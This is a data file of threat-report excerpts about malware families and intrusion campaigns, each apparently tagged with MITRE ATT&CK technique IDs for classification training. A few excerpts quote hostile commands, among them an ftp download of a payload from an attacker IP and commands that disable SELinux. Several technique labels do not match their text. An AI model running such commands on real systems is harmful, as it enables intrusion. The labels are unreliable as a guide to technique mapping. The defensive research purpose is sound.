{"text1":"The infection process is rather interesting, as it involves multiple layers of .NET assemblies that will eventually download the NanoCore remote administration tool (RAT) from a remote server and inject it into another process. In some instances, we have also seen the RemcosRAT malware family delivered as the final payload. The infection process not only downloads and executes a payload, but it also downloads and opens a decoy document to lower the recipient's suspicions of the entire process","labels":"['T1055.002']"}
|
|
{"text1":"LookBack\u202fmalware is a remote access\u202fTrojan\u202fwritten in C++ that relies on a proxy communication tool to relay data\u202ffrom the infected host to a command and control IP","labels":"['T1070.004']"}
|
|
{"text1":"Network activity started with an HTTPS URL to namecha[.]in, which is an alternative namecoin block explorer. Namecoin is a cryptocurrency system that can be used for decentralized DNS. That proves to be the case here, since the URL returned an IP address used for subsequent post-infection traffic as shown in Figure 10","labels":"['T1568']"}
|
|
{"text1":"There are multiple ways for the operators to reach a Kobalos-infected machine. The method we\u2019ve seen the most is where Kobalos is embedded in the OpenSSH server executable (sshd) and will trigger the backdoor code if the connection is coming from a specific TCP source port. These variants either connect to a C&C server that will act as a middleman, or wait for an inbound connection on a given TCP port","labels":"['T1205']"}
|
|
{"text1":"The backdoor component, POWRUNER, is a PowerShell script that sends and receives commands to and from the C2 server. POWRUNER is executed every minute by the Task Scheduler. Figure 5 contains an excerpt of the POWRUNER backdoor","labels":"['T1053.005']"}
|
|
{"text1":"The following network activity observed from msiexec.exe illustrates how the malware leveraged a signed and verified certification from Sectigo RSA Code Signing CA to propagate","labels":"['T1553.002']"}
|
|
{"text1":"Config.json\" is a mining config file for XMRig, an open-source Monero miner. The file sets the mining pool as xmr[.]pool[.]MinerGate[.]com:45700 and the actor's wallet as rocke@live.cn. This configuration file contains the same actor pool and wallet information as the first. Lowerv2.sh\" and \"rootv2.sh\" are similar shell scripts that attempt to download and execute the mining malware components \"bashf\" and \"bashg,\" hosted on 118[.]24[.]150[.]172. If the shell scripts do not download a miner from 118[.]24[.]150[.]172, they attempt to download a file called \"XbashY\" from 3g2upl4pq6kufc4m[.]tk. Based on the config file it uses, it appears to be the Monero Silent Miner. This miner can be purchased online for $14 and targets malicious actors. The sample grabs the config file \"xmr.txt,\" which contains the same configuration information as the previous files, from Rocke's command and control (C2) server hosted on sydwzl[.]cn. Intriguingly, this file appears to share some similarities with Cobalt Strike, the popular penetration testing software, which would allow the attacker to have greater control over the infected system. So, while we can assess with high confidence that the payloads share some code base, we are still unsure of the exact relationship between Rocke and Iron Cybercrime Group","labels":"['T1564.001']"}
|
|
{"text1":"The resulting executable acts as another loader for yet another embedded file. However, this loader uses the hostname of the current system to decrypt the embedded payload. Therefore, if it is run on any system other than the one intended, the malware will fail to execute. This trait illustrates that the malware is customized; it was created specifically for the exact victim system on which it was discovered","labels":"['T1480.001']"}
|
|
{"text1":"Hello, I got kinsing on my main development box (ubuntu 20 lamp stack). NO docker NO redis NO phpunit How it got in, is a mystery. All I can tell is it came in via apache (kinsing was running as www-data and main kinsing executable in \/tmp was owned by www-data). I am using Laravel 7.2.0 not sure are there any loop in the laravel","labels":"['T1133']"}
|
|
{"text1":"This module intercepts HWP documents on an infected computer. The HWP file format is similar to Microsoft Word documents, but supported by Hangul, a South Korean word processing application from the Hancom Office bundle. Hancom Office is widely used in South Korea. The account is hardcoded in the module along with the master\u2019s e-mail to which it sends intercepted documents. It is interesting that the module does not search for all the HWP files on infected computer, but reacts only to those that are opened by the user and steals them. This behavior is very unusual for a document-stealing component and we do not see it in other malicious toolkits","labels":"['T1566.001']"}
|
|
{"text1":"RAR archiving \u2013 files are transferred to staging servers before exfiltration. Certutil \u2013 a command-line utility that can be exploited and used for various malicious purposes, such as to decode information, to download files, and to install browser root certificates. Adfind \u2013 a command-line tool that can be used to perform Active Directory queries. Csvde \u2013 can be used to extract Active Directory files and data. Ntdsutil \u2013 can be used as a credential-dumping tool. WMIExec \u2013 can be used for lateral movement and to execute commands remotely. It can be used to find information and execute code, and is frequently abused by malicious actors","labels":"['T1119']"}
|
|
{"text1":"LaZagne (SecurityRisk.LaZagne): A login\/password retrieval tool - Mimikatz (Hacktool.Mimikatz): Tool designed to steal credentials - Gpppassword: Tool used to obtain and decrypt Group Policy Preferences (GPP) passwords - SniffPass (SniffPass): Tool designed to steal passwords by sniffing network traffic","labels":"['T1040']"}
|
|
{"text1":"As is evident here, the SSH server will accept connections on port number 6789. By running SSH on the server in a compromised network, attackers can come back to the network whenever they want","labels":"['T1571']"}
|
|
{"text1":"Additionally, once infected, the malware cycles through a large list of command and control (C&C) servers embedded within the malware. It appears while the list is extensive, not all of the C&Cs are active and continue to beacon until a successful connection is established. Despite modifying a small part of itself while copying itself across the network as a means to evade detection, the operators have made no effort to change the C&C communication protocol since its first inception","labels":"['T1049', 'T1008']"}
|
|
{"text1":"After exfiltrating the files, the threat actor used web shell access on the staging server to delete the staged RAR archives and detach their network shares, likely to avoid detection. Figure 5 shows the commands used to perform these activities on a RAR archive renamed with a *.jpg extension","labels":"['T1070.004']"}
|
|
{"text1":"The threat actor conducts mass-scanning and uses tools, such as Nmap, to identify open ports. Once the open ports are identified, the threat actor exploits CVEs related to VPN infrastructure to gain initial access to a targeted network. CISA and the FBI have observed the threat actor exploiting multiple CVEs, including CVE-2019-11510, CVE-2019-11539, CVE-2019-19781, and CVE-2020-5902","labels":"['T1046']"}
|
|
{"text1":"This final payload is the ThreatNeedle loader running in memory. In addition, the malware saves the configuration data as a registry key encrypted in RC4","labels":"['T1112']"}
|
|
{"text1":"Containers that are created during the attack are configured to bind \/tmpXXXXXX directory to the root directory of the hosting server. This means every file on the server\u2019s filesystem can be accessed and even modified, with the correct user permissions, from within the container","labels":"['T1611']"}
|
|
{"text1":"Several files are created by Carbon to keep logs, tasks to execute and configuration that will modify the malware\u2019s behavior. The contents of the majority of these files are encrypted with the CAST-128 algorithm [4","labels":"['T1027']"}
|
|
{"text1":"Upon ejection from the network, APT15 managed to regain access a couple of weeks later via the corporate VPN solution with a stolen VPN certificate, which they had extracted from a compromised host","labels":"['T1133']"}
|
|
{"text1":"On a different system, operators dropped a legitimate copy of credwize.exe, the Microsoft Credential Backup and Restore Wizard, on disk and used it to execute the malicious library New.dll, another Turian variant","labels":"['T1055.001']"}
|
|
{"text1":"While the IronPython scripts are only the first part of the tool, the main task of loading malware is done by an embedded process injector. We dubbed this toolchain IronNetInjector, the blend of IronPython and the injector\u2019s internal project name NetInjector. In this blog, we describe the IronPython scripts and how they\u2019re used to load one or more payloads with the help of an injector","labels":"['T1059.006', 'T1059.006']"}
|
|
{"text1":"IAT hooking and inline hooking are generally known as userland rootkits. IAT hooking is a technique that malware uses to change the import address table. In contrast, with inline hooking, malware modifies the API function itself. In Figure 11, the malware FinFisher, performs IAT hooking by modifying where the CreateWindowEx points","labels":"['T1056.004']"}
|
|
{"text1":"Our dynamic analysis showed Lokibot\u2019s behavior, including the benefits and drawbacks of several unpacking methods. Lokibot also used an infected system machine global unique identifier (GUID) value to generate a mutex (an MD5 hash) that acted as a flag to prevent itself from infecting the same machine again. The subject lines of the campaign messages usually started with or included the term \u201cproforma.\u201d The malicious attachment was a DOCX, with a file name that also included \u201cproforma\u201d in its pattern. Characteristics: Lokibot is an information stealer; the main functionality of its binary is to collect system and application credentials, and user information to send back to the attacker. We then conducted a static analysis to examine Lokibot\u2019s techniques and targets. It starts from the tenth byte in the data section of the initial TCP POST request. We also noticed that the value of the sub key is the path to the file that Lokibot created after its initial execution. The binary\u2019s hardcoded strings provided data about the binary\u2019s characteristics, behavior, and main functionality. Section Headers: From the section headers and distribution of each section, the binary appears to be fairly normal. Figure 9. Hollow Process; Manually Unpacking the First Stage Binary: We tried to follow the binary with a debugger to determine where it unpacked itself in the memory, but Lokibot used a hollow process technique to obscure some of this activity","labels":"['T1555.003']"}
|
|
{"text1":"The payload decrypted at the previous step is a PowerShell reflective loader. It is based on the script Invoke-ReflectivePEInjection.ps1 from the same PowerSploit framework. The executable is hardcoded in the script and is loaded directly into the memory of a randomly chosen process that is already running on the system","labels":"['T1055']"}
|
|
{"text1":"Before proceeding to file encryption operations, the ransomware force stops (\u201ckills\u201d) processes listed by process name in a hard-coded list within the encoded strings of the malware. A full list with assessed process function or relationship is provided in Appendix A of this report. While some of the referenced processes appear to relate to security or management software (e.g. Qihoo 360 Safeguard and Microsoft System Center), the majority of the listed processes concern databases (e.g. IBM Tivoli), or ICS-related processes","labels":"['T1562.001']"}
|
|
{"text1":"The WannaCry malware consists of two distinct components, one that provides ransomware functionality and a component used for propagation, which contains functionality to enable SMB exploitation capabilities","labels":"['T1210']"}
|
|
{"text1":"One notable difference is that this particular stager included functionality that allowed the stager to communicate with the command and control (C2) via an encrypted RC4 byte stream. In this sample, the threat actors' C2 server was the domain msdn[.]cloud","labels":"['T1573.001']"}
|
|
{"text1":"In order to exfiltrate data, the plugin uses the function \u201cpost\u201d in the HTTPClient class. Post\u201d gives the plugin the ability to upload content and exfiltrate data to the remote C2 whose domain is stored in the registry","labels":"['T1041']"}
|
|
{"text1":"The main idea here is that if you create a LNK to an executable or command, then use the ShowGroup method, the program will be executed. This is an undocumented behavior in Microsoft Windows","labels":"['T1559.002']"}
|
|
{"text1":"Filter the target machines: setup.bat first checks if the hostname of the machine is one of the following: PIS-APP, PIS-MOB, WSUSPROXY or PIS-DB. If so, it stops the execution and deletes the folder containing the malicious script from this machine. Download the malicious files onto the machine: the same batch file downloads a cab archive named env.cab from a remote address in the internal network: \\\\railways.ir\\sysvol\\railways.ir\\scripts\\env.cab. The use of specific hostnames and internal paths indicates the attacker had prior knowledge of the environment. Unleash the main payload: The msrun.bat script is responsible for unleashing the Wiper. It moves wiper-related files to \u201cC:\\temp\u201d and creates a scheduled task named mstask to execute the wiper only once at 23:55:00","labels":"['T1070.004']"}
|
|
{"text1":"Trickbot is installed as a scheduled task, using names like \u201cWinDotNet,\u201d \u201cGoogleTask,\u201d or \u201cSysnetsf\u201d to masquerade as legitimate-appearing processes. These point to various copies of TrickBot installed in the system, usually within the user profile under %USER_DIR%\\AppData\\Roaming\\ or a subdirectory. The subdirectories also use similarly misleading names like \u201cWinDefrag\u201d or \u201cNetSocket\u201d to appear innocuous. TrickBot may also be installed as a service with names like \u201cControlServiceA\u201d that points to a copy in the system drive root","labels":"['T1543.003', 'T1036.004']"}
|
|
{"text1":"1) Establish persistence via the Startup folder or the Run registry key (some variants). 2) Inject itself to another process such as rundll32.exe and dllhost.exe (some variants). 3) Decrypt two blobs: Import Table and the loader configuration","labels":"['T1547.001', 'T1055.001']"}
|
|
{"text1":"Aside from stealing credentials from applications, it also steals the following information from several popular web browsers such as Google Chrome, Mozilla Firefox, Internet Explorer, and Microsoft Edge","labels":"['T1555.003']"}
|
|
{"text1":"The adversary also used the commodity Cobalt Strike framework and Plink tunneling tool in many of these campaigns","labels":"['T1558.003']"}
|
|
{"text1":"The Lizar server application, meanwhile, is written using the .NET framework and runs on a remote Linux host, researchers said. It supports encrypted communications with the bot client","labels":"['T1573']"}
|
|
{"text1":"The observed JSS Loader infection led to the download and execution of a setup VBScript from https[:]\/\/petshopbook[.]com","labels":"['T1059.005']"}
|
|
{"text1":"Once the registry value is created, the attackers simply wait for the occasional execution of dllhost.exe, which might happen naturally on a system. This execution triggers a process launch of wscript.exe configured to run the VBScript file dropped in step #4","labels":"['T1082', 'T1546.012']"}
|
|
{"text1":"It will then spawn a suspended instance of msiexec.exe in a new process. The malware proceeds to load code from the \u2018aclmain.sdb\u2019 file and performs process hollowing against this instance of msiexec.exe prior to resuming the process","labels":"['T1055.012']"}
|
|
{"text1":"Each of the Silent Librarian lures ends with a very realistic looking closing signature containing contact information for the target library. This information is collected through open source research conducted by the threat actors. In some cases, all of the contact information can be found together on one webpage; however, some of the information is in different locations, indicating the actors are likely performing manual reconnaissance to gather the information","labels":"['T1594']"}
|
|
{"text1":"The primary objective of the HermeticWiper is to destroy the master boot record (MBR) of a system, shredding data and rendering the system unusable","labels":"['T1561.002']"}
|
|
{"text1":"Hildegard searches for credential files on the host, as well as queries metadata for cloud-specific credentials","labels":"['T1552.005']"}
|
|
{"text1":"FIN6 also moved laterally to servers in the environment using RDP and configured them as malware \u201cdistribution\u201d servers. The distribution servers were used to stage the LockerGoga ransomware, additional utilities, and deployment scripts to automate installation of the ransomware. Mandiant identified a utility script named kill.bat that was run on systems in the environment. This script contained a series of anti-forensics and other commands intended to disable antivirus and destabilize the operating system. FIN6 automated the deployment of kill.bat and the LockerGoga ransomware using batch script files. FIN6 created a number of BAT files on the malware distribution servers with the naming convention xaa.bat, xab.bat, xac.bat, etc. These BAT files contained psexec commands to connect to remote systems and deploy kill.bat along with LockerGoga. FIN6 renamed the psexec service name to \u201cmstdc\u201d in order to masquerade as the legitimate Windows executable \u201cmsdtc","labels":"['T1562.001']"}
|
|
{"text1":"Based on our analysis, financial organizations in Turkey were targeted via spear phishing emails containing a malicious Microsoft Word document. The document contains an embedded Adobe Flash exploit, which was recently announced by the Korean Internet Security agency","labels":"['T1566.001']"}
|
|
{"text1":"Business info at outsidersecurity.nl . Introducing ROADtools - The Azure AD exploration framework . 15 minute read . Over the past 1.5 years I\u2019ve been doing quite a lot of exploration into Azure AD and how it works under the hood. So I set myself a few goals: - Provide tooling for both Red teams and Blue teams to explore all Azure AD data in an accessible way. Use asynchronous HTTP calls in Python to dump all available information in the Azure AD graph to this database. Where to get the data . Since Azure AD is a cloud service, there isn\u2019t a way to reverse engineer how it works, or a central repository where all the data is stored that you can access. While researching Azure and looking through the requests in the Azure Portal, at some point I noticed that the portal was calling a different version of the Azure AD Graph, the 1.61-internal version. This internal version of the Azure AD graph exposes much more data than any of the official API\u2019s that are offered by Microsoft. To create the object structure, ROADrecon uses the OData metadata definition that the Azure AD graph exposes. ROADrecon will by default pretend to be the Azure AD PowerShell module and will thus inherit its permissions to access the internal version of the Azure AD graph. Gathering all the data . The second step is data gathering, which the roadrecon gather command does. That being said, there is a setting in the deprecated MSOnline PowerShell module which prevents enumeration using the Azure AD graph, which is documented here","labels":"['T1119']"}
|
|
{"text1":"After the variables are set, the command line script copies QlpxpQpOpDpnpRpC.ini to the executable name that has been picked for this run and then attempts to kill any legitimate process using the specified name before launching it. The name for the .ini file is randomized per archive, but almost always turns out to be that of the VNC server itself","labels":"['T1036.005']"}
|
|
{"text1":"The launcher then configures several Registry values, including SecurityPasswordAES, that control how the remote access tool will work","labels":"['T1547.001', 'T1550.002']"}
|
|
{"text1":"DEATHRANSOM is written in C while the other two families are written in C++. DEATHRANSOM uses a distinct series of do\/while loops to enumerate through network resources, logical drives, and directories. It also uses QueueUserWorkItem to implement thread pooling for its file encryption threads","labels":"['T1083']"}
|
|
{"text1":"The ANCHOR backdoor has been seen across a subset of intrusions associated with this activity and can often be identified via the scheduled tasks it uses to maintain persistence through reboot. The scheduled tasks created by ANCHOR are often unnamed, although that is not always the case","labels":"['T1053.005']"}
|
|
{"text1":"Two PDF files (***_SPE_LEOS and ***_HPC_SE) with aerospace & defense industry themed images, created via the Microsoft Print to PDF service, were submitted along with ***_ECS_EPM.docx. The naming convention of these PDF files was very similar to the malicious documents used. The name includes abbreviations for positions at the defense contractor much like the malicious documents. The Microsoft Print to PDF service enables content from a Microsoft Word document be printed to PDF directly. The PDFs were discovered in an archive file indicating that LinkedIn may have been a possible vector utilized by the adversaries to target victims. This is a similar vector as to what has been observed in a campaign reported by industry[7], however as mentioned earlier the research covered in this blog is part of a different activity set","labels":"['T1566.001']"}
|
|
{"text1":"The adversary used the built-in lateral movement possibilities in Cobalt Strike. Cobalt Strike has various methods for deploying its beacons at newly compromised systems. We have seen the adversary using SMB, named pipes, PsExec, and WinRM. They continue lateral movement and discovery in an attempt to identify the data of interest. This could be a webserver to carve data from memory, or a fileserver to copy IP, as we have both observed","labels":"['T1041']"}
|
|
{"text1":"The SOMBRAT backdoor is packaged as a 64-bit Windows executable. It communicates with a configurable command and control (C2) server via multiple protocols, including DNS, TLS-encrypted TCP, and potentially WebSockets. Although the backdoor supports dozens of commands, most of them enable the operator to manipulate an encrypted storage file and reconfigure the implant. The backdoor's primary purpose is to download and execute plugins provided via the C2 server. In contrast to the SOMBRAT version published in November 2020, Mandiant observed additional obfuscation and armoring to evade detection, this SOMBRAT variant has been hardened to discourage analysis. Program metadata typically included by the compiler has been stripped and strings have been inlined and encoded via XOR-based routines","labels":"['T1027']"}
|
|
{"text1":"If the file \/usr\/sbin\/setenforce exists, the malware executes the command, setenforce 0. This command configures the system\u2019s Security-Enhanced Linux (SELinux) module, which provides support in the system's access control policies, into permissive mode \u2014 that is, setting the SELinux policy so that it is not enforced. If the system has the \/etc\/selinux\/config file, it will write these commands into the file: SELINUX=disabled and SELINUXTYPE=targeted commands. The former disables the SELinux policy (or disallows one to be loaded), while the latter sets selected processes to run in confined domains","labels":"['T1518.001']"}
|
|
{"text1":"One of the tactics it uses to avoid drawing attention to itself is impersonating commonly used software packages such as Windows or Adobe Reader. It has never attempted to compromise the software itself. Rather, it gives its tools file names similar to those used by the software and places them in directory trees that could be mistaken for those used by the legitimate software","labels":"['T1036.005']"}
|
|
{"text1":"From a code perspective, little has changed between Ryuk binaries compiled in March and those compiled in September. The functionality has remained overall static since introducing features for targeting hosts on a local area network (LAN). The most notable change to Ryuk is the introduction of code obfuscation. The code obfuscations appear to be designed to slow down the reverse engineering process by using anti-disassembly and code transformation obfuscation techniques","labels":"['T1027']"}
|
|
{"text1":"Since 2020, Proofpoint researchers have observed TA416, an actor assessed to be aligned with the Chinese state, utilizing web bugs to profile their targets. Commonly referred to as tracking pixels, web bugs embed a hyperlinked non-visible object within the body of an email that, when enabled, will attempt to retrieve a benign image file from an actor-controlled server. This provides a \u201csign of life\u201d to threat actors and indicates that the targeted account is valid with the user being inclined to open emails that utilize social engineering content. TA416 has been using web bugs to target victims prior to delivering malicious URLs that have installed a variety of PlugX malware payloads","labels":"['T1608']"}
|
|
{"text1":"Cybercriminals will often use LNK files attached in an email to launch an attack on unsuspecting victims. And we recently noticed another campaign using this technique","labels":"['T1204.002']"}
|
|
{"text1":"After this information is obtained, the attacker can generate and send a specially crafted HTTP POST request to the Exchange server with an XML SOAP payload to the Exchange Web Services (EWS) API endpoint","labels":"['T1590']"}
|
|
{"text1":"A threat actor known as Silent Librarian\/TA407\/COBALT DICKENS has been actively targeting universities via spear phishing campaigns since schools and universities went back","labels":"['T1608.005']"}
|
|
{"text1":"Once run, the wiper will damage the Master Boot Record (MBR) of the infected computer, rendering it inoperable","labels":"['T1561.002']"}
|
|
{"text1":"Checking the DLLs related to iDefense SysAnalyzer, Microsoft Debugging DLL and Sandboxies - Calling IsDebuggerPresent and GetTickCount to identify a debugger - Checking VMWare related file","labels":"['T1497.001']"}
|
|
{"text1":"The Daum variants of Brave Prince gather information from the system and save it to the file PI_00.dat. This file is sent as an attachment to the attacker\u2019s email address. Later variants upload the file to a web server via an HTTP post command. The type of data this implant gathers from the victim\u2019s system","labels":"['T1083', 'T1048.003']"}
|
|
{"text1":"CookieMiner issues a series of commands to configure the victim\u2019s machine to mine cryptocurrency and maintain persistence (Figure 6). The program xmrig2 is a Mach-O executable for mining cryptocurrency. As seen in Figure 7, the address \u201ck1GqvkK7QYEfMj3JPHieBo1m7FUkTowdq6H\u201d has considerable mining performance. It has been ranked as a top miner in the Maruru mining pool (koto-pool.work). The cryptocurrency mined is called Koto, which is a Zcash-based anonymous cryptocurrency. The addresses in Figure 8 use the \u201cYescrypt\u201d algorithm, which is good for CPU miners but not ideal for GPU miners. This is ideal for malware as the victim hosts are not guaranteed to have discrete GPUs installed in them but are guaranteed to have a CPU available. We believe the malware authors may have intentionally used this filename to create confusion since the miner is actually mining the Koto cryptocurrency","labels":"['T1543.001']"}
|
|
{"text1":"For every hard-coded TCP port used to communicate with the C&C servers, the malware creates a rule in Netfilter \u2014\u00a0the Linux kernel firewall \u2014\u00a0using the iptc_insert_entry() function from libiptc1 to allow output communication to it","labels":"['T1562.004']"}
|
|
{"text1":"38, the credentials are retrieved from the logins.json file and the browser history is retrieved from the places.sqlite database","labels":"['T1217']"}
|
|
{"text1":"The operators simply deploy their first-stage .php script in them, which will check the connection and get the actual C2 server domain name using an HTTP GET request","labels":"['T1071.001']"}
|
|
{"text1":"1) Copy itself to the %APPDATA%\\Microsoft folder, add this file path in the registry \u2018Run\u2019 key under the value \u2018BackUp Mgr\u2019 and then execute the loader from the copied location. 2) If the loader cannot access the %APPDATA% location or if the loader is running from this location already, then it adds the current file path in the \u2018Run\u2019 registry key under the value \u2018BackUp Mgr\u2019 and executes the loader again from this location","labels":"['T1547.001']"}
|
|
{"text1":"As we mentioned, the adversary used a technique called template injection. A .docx file is a zip file containing multiple parts. Using the template injection technique, the adversary puts a link to the template file in one of the .XML files; for example, the link is in settings.xml.rels while the external oleobject load is in document.xml.rels. The link will load a template file (DOTM) from a remote server. Some of these template files are renamed as JPEG files when hosted on a remote server to avoid any suspicion and bypass detection. These template files contain Visual Basic macro code that will load a DLL implant onto the victim\u2019s system","labels":"['T1036']"}
|
|
{"text1":"We suspect that the malware uses this extension to grab the victim\u2019s cookies and use them from another device to ride the victim\u2019s active session","labels":"['T1539']"}
|
|
{"text1":"Last but not least, the malware creates an id, in the same way as seen in previous Zebrocy binaries. It retrieves the UserName via the GetUserNameW Windows API and prepends the volume serial number of the C:\\ drive","labels":"['T1082']"}
|
|
{"text1":"Should the victim use one of these portable browsers with a proxy server configured, the malware can find that in the user\u2019s preferences and use that proxy to communicate with its C&C servers","labels":"['T1090.002']"}
|
|
{"text1":"APT10 has targeted or compromised manufacturing companies in India, Japan and Northern Europe; a mining company in South America; and multiple IT service providers worldwide. Traditional and Novel Methods. This recent APT10 activity has included both traditional spear phishing and access to victims\u2019 networks through service providers. In addition to the spear phishes, FireEye ISIGHT Intelligence has observed APT10 accessing victims through global service providers. Service providers have significant access to customer networks, enabling an attacker who has compromised a service provider to move laterally into the network of the service provider\u2019s customer. In addition, web traffic between a service provider\u2019s customer and a service provider is likely to be viewed as benign by network defenders at the customer, allowing the attacker to exfiltrate data stealthily. A notable instance of this observed by FireEye involved a SOGU backdoor that was set to communicate with its C2 through a server belonging to the victim\u2019s service provider. The actor then tested connectivity to an IP managed by the victim\u2019s service provider. Once connectivity to the service provider IP was verified, the actor established the service provider IP as a proxy for the victim\u2019s SOGU backdoor. This effectively routes SOGU malware traffic through the victim\u2019s service provider, which likely indicates a foothold on the service provider\u2019s network. Their abuse of access to service provider networks demonstrates that peripheral organizations continue to be of interest to a malicious actor \u2013 especially those seeking alternative angles of attack","labels":"['T1199']"}
|
|
{"text1":"Wiping all available methods of recovery shows this attacker had no intention of leaving the machine useable. Additionally, the destroyer disables all the services on the system: The malware uses the ChangeServiceConfigW API to change the start type to 4 which means: \"Disabled: Specifies that the service should not be started","labels":"['T1489']"}
|
|
{"text1":"In another update, the P8RAT sample from August 2020 looks for two process names (\u201cVBoxService.exe\u201d and \u201cvmtoolsd.exe\u201d) on the victim\u2019s system, to detect VMware or VirtualBox environments at the beginning of its main malicious function","labels":"['T1497.001']"}
|
|
{"text1":"While Emotet has been around for many years and is one of the most well-known pieces of malware in the wild, that doesn't mean attackers don't try to freshen it up. These new campaigns have been observed following a period of relatively low Emotet distribution activity, corresponding with the observance of Orthodox Christmas in certain geographic regions. These new malicious efforts involve sending victims malicious Microsoft Word attachments with embedded macros that download Emotet. This latest strain has also gained the ability to check if the infected IP where the malicious email is being sent from is already blocklisted on a spam list","labels":"['T1059.005']"}
|
|
{"text1":"PlugX executes DLL hijacking with benign applications such as ESET antivirus and Adobe Update. Also, the PlugX that Mustang Panda APT uses has some extra features, including spreading through USB, gathering information, and stealing documents in air-gapped networks via USB","labels":"['T1059.003']"}
|
|
{"text1":"In this ongoing campaign, FIN7 is targeting organizations with spear phishing emails containing either a malicious DOCX or RTF file \u2013 two versions of the same LNK file and VBScript technique. These lures originate from external email addresses that the attacker rarely re-used, and they were sent to various locations of large restaurant chains, hospitality, and financial service organizations. As with previous campaigns, and as highlighted in our annual M-Trends 2017 report, FIN7 is calling stores at targeted organizations to ensure they received the email and attempting to walk them through the infection process","labels":"['T1566.001']"}
|
|
{"text1":"The dropper extracts modules from these resources by seeking a specific offset and reading a specific number of bytes as the length of the ciphertext. The dropper then decrypts the ciphertext by using an XOR cipher and a specific base64-encoded string that is decoded and used as the key. Before accessing the ciphertext, the dropper subtracts 14 from the specified offset, which is the same as previous Disttrack samples delivered in Shamoon 2 attacks. Tables 1, 2, and 3 include the resources, the information used to extract them, and the resulting module","labels":"['T1140']"}
|
|
{"text1":"Disttrack uses the internal domain names and credentials to log into remote systems on the same network segment","labels":"['T1016']"}
|
|
{"text1":"Curl is used to send the AWS credentials to TeamTNT\u2019s server, which responds with the message \u201cTHX","labels":"['T1071.001']"}
|
|
{"text1":"The Helminth executable is able to communicate with its C2 server via HTTP and via DNS queries in very similar ways to the Helminth script variant. In fact, the DNS beacons follow the same structure and sequence as the script variant of Helminth discussed in the previous section","labels":"['T1573.001']"}
|
|
{"text1":"All this information was then sent to one of the following domains: G1 also had the ability to execute commands remotely on the infected host machine at the author's will","labels":"['T1059.003']"}
|
|
{"text1":"NoComm \u2013 No command, which causes the script to keep sending POST requests. Base64 string \u2013 A module to execute. The module is encrypted with a simple substitution cipher and encoded in base64","labels":"['T1573.001']"}
|
|
{"text1":"Those payloads consist of a legitimate and signed Microsoft executable used as a DLL search-order hijacking host and a malicious DLL loaded by that executable. The malicious DLL is a ShadowPad loader","labels":"['T1574.001']"}
|
|
{"text1":"Starting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download via the File Transfer Protocol (FTP). Specifically, APT41 executed the command \u2018\/usr\/bin\/ftp -o \/tmp\/bsd ftp:\/\/test:[redacted]\\@66.42.98[.]220\/bsd\u2019, which connected to 66.42.98[.]220 over the FTP protocol, logged in to the FTP server with a username of \u2018test\u2019 and a password that we have redacted, and then downloaded an unknown payload named \u2018bsd\u2019 (which was likely a backdoor","labels":"['T1071.002']"}
|
|
{"text1":"Given their capability and sophistication, it is unlikely that IRON RITUAL's intrusions will leave sufficient artifacts to allow researchers to associate their activities with previous or future Russian cyber espionage operations. The group has used malware including the SUNBURST (also known as Solorigate) backdoor and in-memory Cobalt Strike delivered using the TEARDROP and RAINDROP loaders. CTU researchers assess with high confidence that IRON RITUAL's intent is long term, covert access to networks of interest for the purposes of espionage and data theft","labels":"['T1550']"}
|
|
{"text1":"Let\u2019s look at an example. During our investigation of an infection at a computer game company, we found that malware had been created for a particular service on the company\u2019s server. The malicious program was looking for a specific process running on the server, injected code into it, and then sought out two places in the process code where it could conceal call commands for its function interceptors. Using these function interceptors, the malicious programs modified process data which was processed in those two places, and returned control back. Thus, the attackers change the normal execution of the server processes. Unfortunately, the company was not able to share its targeted application with us, and we cannot say exactly how this malicious interference affected gaming processes","labels":"['T1057']"}
|
|
{"text1":"1) Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3, the remote location is http:\/\/185.203.119[.]184\/Dropbox\/request, and the script only continues if the file exists","labels":"['T1564.001']"}
|
|
{"text1":"The adversary uses Cobalt Strike as a framework to manage their compromised systems. We observed the use of Cobalt Strike\u2019s C2 protocol encapsulated in DNS by the adversary in 2017 and 2018. They switched to C2 encapsulated in HTTPS in Q3 2019. An interesting observation is that they made use of a cracked\/patched trial version of Cobalt Strike. This is important to note because the functionalities of Cobalt Strike\u2019s trial version are limited. More importantly: the trial version doesn\u2019t support encryption of command and control traffic in cases where the protocol itself isn\u2019t encrypted, such as DNS. The DNS responses weren\u2019t logged. This means that only the DNS C2 leaving the victim\u2019s network was logged. We developed a Python script that decoded and combined most of the logged C2 communication into a human readable format. As the adversary used Cobalt Strike with DNS as command & control protocol, we were able to reconstruct more than two years of adversary activity","labels":"['T1071.004']"}
|
|
{"text1":"The TrickBot module used for credential harvesting is pwgrab64. As with all modules launched by the TrickBot core, pwgrab64 is installed into a subfolder, usually named either \u201cmodules\u201d or \u201cdata,\u201d and modifies the following registry value","labels":"['T1112']"}
|
|
{"text1":"This command will attempt to download and execute a remote file via the Microsoft Windows built-in certutil utility. More information on this technique and the CARROTBAT malware family may be found within the Appendix","labels":"['T1105']"}
|
|
{"text1":"REvil sends the encrypted stat data containing the host profile and malware information to the C2 URL via the HTTP POST method. Detection of the associated network traffic is challenging because REvil uses the HTTPS protocol, which encrypts the network communication. Finally, REvil terminates execution","labels":"['T1071.001']"}
|
|
{"text1":"Anchor_DNS was able to stay under the radar by using specific execution flags. If these command-line arguments are not supplied, Anchor_DNS terminates","labels":"['T1480']"}
|
|
{"text1":"The malware supports several capabilities, such as injecting and executing arbitrary code, uploading and downloading files, and executing shell commands. BLACKCOFFEE: a backdoor that obfuscates its communications as normal traffic to legitimate websites such as GitHub and Microsoft's Technet portal","labels":"['T1102.002']"}
|
|
{"text1":"The dns.ps1 script is also responsible for communicating with the C2 server, but it uses DNS queries to send data to the server. The DNS queries sent by this script are queries to subdomains on the same domain as the C2 server, which contain system information or the contents of files from the system. The subdomain of the DNS request that acts as the initial C2 beacon has the following structure","labels":"['T1012']"}
|
|
